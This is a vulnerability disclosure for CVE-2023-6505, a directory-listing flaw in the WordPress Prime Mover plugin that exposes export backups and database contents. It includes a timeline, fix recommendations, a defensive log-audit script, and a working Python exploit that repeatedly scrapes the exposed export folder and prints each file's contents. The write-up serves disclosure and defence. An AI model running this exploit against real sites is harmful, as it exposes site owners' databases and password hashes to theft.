A critical vulnerability has been uncovered in the Prime Mover plugin, specifically within the directory http://your_site/wordpress/wp-content/uploads/prime-mover-export-files/1/. This vulnerability not only reveals comprehensive information about the site, including its configuration, directories, and files, but more critically, it grants unauthorized access to sensitive data within the database, presenting a significant security risk. The exploitation of this vulnerability could lead to potential brute force attacks on password hashes, posing an imminent threat to the compromise of the entire system.

Main info:

CVE: CVE-2023-6505
Plugin: Prime Mover < 1.9.3
Critical: Super High
All Time: 160 361
Active installations: 8 000+
Publicly Published: December 12, 2023
Last Updated: December 12, 2023
Researcher: Dmitrii Ignatyev
OWASP TOP-10: A3: Sensitive Data Exposure
PoC: Yes
Exploit: Yes
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6505
https://wpscan.com/vulnerability/eca6f099-6af0-4f42-aade-ab61dd792629/
Plugin Security Certification by CleanTalk

Timeline

November 24, 2023 – Plugin testing and vulnerability detection in the Prime Mover plugin have been completed
November 24, 2023 – I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
December 2, 2023 – The author fixed the vulnerability and released the plugin update
December 12, 2023 – Registered CVE-2023-6505

Discovery of the Vulnerability

A severe vulnerability has been discovered in the directory http://your_site/wordpress/wp-content/uploads/prime-mover-export-files/1/. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and everything stored in it. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.

Understanding Directory Listing Attacks

Directory listing vulnerabilities involve the unintended exposure of directory contents, allowing unauthorized users to view files and directories. In WordPress, this could inadvertently reveal sensitive information, such as configuration details and file structures. Real-world examples highlight the risk of attackers leveraging such exposures to gain insights into the site’s infrastructure, potentially leading to unauthorized access and manipulation of sensitive data.

Exploiting the Directory Listing Vulnerability

Exploiting the vulnerability in Prime Mover involves utilizing the exposed directory to gain unauthorized access to sensitive data. Attackers may specifically target files containing password hashes, using this information to launch brute force attacks. Successful exploitation could lead to unauthorized access, manipulation of data, and other malicious activities, ultimately compromising the integrity and security of the entire system.

POC:

0) Go to Packages and create a new one (if there is no backup yet)

1) Go to this URL manually – http://your_site/wordpress/wp-content/uploads/prime-mover-export-files/1/

2) Or you can use the exploit below

EXPLOIT (python3):

import requests
from bs4 import BeautifulSoup
import re
import time

# Root of the exposed Prime Mover export directory on the test site (127.0.0.1 here)
base_url = "http://127.0.0.1/wordpress/wp-content/uploads/prime-mover-export-files/1/"
processed_files = set()
processed_folders = set()

def get_file_names(url):
    """Parse the server's directory-listing page and return the entries it links to."""
    response = requests.get(url)
    
    if response.status_code == 200 and len(response.text) > 0:
        soup = BeautifulSoup(response.text, 'html.parser')
        links = soup.find_all('a')
        
        file_names = []
        for link in links:
            file_name = link.get('href')
            # Skip anchors without href, the parent-directory link and the autoindex sort links ("?C=...")
            if file_name and file_name != "../" and not file_name.startswith("?"):
                file_names.append(file_name)
                
        return file_names
    return []

def get_file_content(url, file_name):
    file_url = url + file_name
    
    # Ignore files whose name ends in '.zip' or '.zip.*' (binary archives, not readable as text)
    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):
        print(f"Ignoring file: {file_name}")
        return None
    
    file_response = requests.get(file_url)
    
    if file_response.status_code == 200:
        return file_response.text
    return None

# Poll the listing every 5 seconds so that newly created export folders and files are picked up
while True:
    folders = get_file_names(base_url)

    if folders:
        print("Folders on the page:")
        for folder_name in folders:
            if folder_name not in processed_folders:
                print(folder_name)
                folder_url = base_url + folder_name
                files_in_folder = get_file_names(folder_url)
                
                if files_in_folder:
                    print("File names in the folder:")
                    for file_name in files_in_folder:
                        if file_name not in processed_files:
                            print(file_name)
                            file_content = get_file_content(folder_url, file_name)
                            
                            if file_content is not None:
                                print("File content:")
                                print(file_content)
                                processed_files.add(file_name)
                
                processed_folders.add(folder_name)

    time.sleep(5)

___

The potential risk associated with this vulnerability is severe. In real-world scenarios, attackers could exploit the exposed directory to conduct reconnaissance on the site’s structure, locate critical files, and access sensitive data within the database. This could lead to unauthorized access, data manipulation, and other malicious activities, jeopardizing the security of the entire system.

Recommendations for Improved Security

  • Directory Security Measures: Implement robust security measures for directories, including access controls and regular audits to detect and address vulnerabilities promptly.
  • Database Encryption: Employ encryption for sensitive data stored in the database to safeguard it even if unauthorized access occurs.
  • Plugin Update: Ensure that the Prime Mover plugin is regularly updated with the latest security patches to address this vulnerability.
  • Password Policy: Enforce strong password policies to minimize the risk of successful brute force attacks.

By implementing these security measures, administrators can significantly reduce the risk of unauthorized access and data exposure associated with the Prime Mover vulnerability.
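As an added defender-side example (not code from the advisory or from the plugin), the check below runs over web-server access log lines and reports which clients were served a directory listing of the Prime Mover export folder and which files they fetched from it, which is the audit the first recommendation calls for; the combined log format, the sample lines and the file name are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Exposed Prime Mover export tree named in the advisory (the "1" subfolder is one site id).
EXPORT_DIR = "/wp-content/uploads/prime-mover-export-files/"

# Apache/Nginx combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def classify_request(line):
    """Return (kind, ip, path) for a successful request into the export tree, else None.
    kind is 'listing' for the directory itself (autoindex page) or 'download' for a file."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)  # drops autoindex sort queries (?C=M;O=D), decodes %2F etc.
    if not path.startswith(EXPORT_DIR) or not m.group("status").startswith("2"):
        return None
    kind = "listing" if path.endswith("/") else "download"
    return kind, m.group("ip"), path

def find_export_dir_access(lines):
    """Summarise, per source IP, how many listings were served and which files were fetched."""
    report = {}
    for line in lines:
        hit = classify_request(line)
        if hit is None:
            continue
        kind, ip, path = hit
        entry = report.setdefault(ip, {"listings": 0, "files": set()})
        if kind == "listing":
            entry["listings"] += 1
        else:
            entry["files"].add(path)
    return report

# Constructed sample log lines (not from the advisory); the file name is a placeholder.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Nov/2023:10:00:01 +0000] "GET /wp-content/uploads/prime-mover-export-files/1/ HTTP/1.1" 200 812',
    '203.0.113.5 - - [24/Nov/2023:10:00:02 +0000] "GET /wp-content/uploads/prime-mover-export-files/1/?C=M;O=D HTTP/1.1" 200 812',
    '203.0.113.5 - - [24/Nov/2023:10:00:05 +0000] "GET /wp-content/uploads/prime-mover-export-files/1/site-export.sql HTTP/1.1" 200 51200',
    '198.51.100.9 - - [24/Nov/2023:10:01:00 +0000] "GET /wp-content/uploads/prime-mover-export-files/1/ HTTP/1.1" 403 199',
    '198.51.100.9 - - [24/Nov/2023:10:01:03 +0000] "GET /wp-admin/ HTTP/1.1" 302 0',
]
```

A 200 on the directory path itself means the server is still serving listings; once indexes are disabled for that folder (for example Apache's Options -Indexes) or the patched plugin is installed, the same request should log a 403 or 404 and no longer count.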


DMITRII I.

CVE-2023-6505 – Prime Mover – Directory Listing to Account Takeover and Sensitive Data Exposure – POC/Exploit
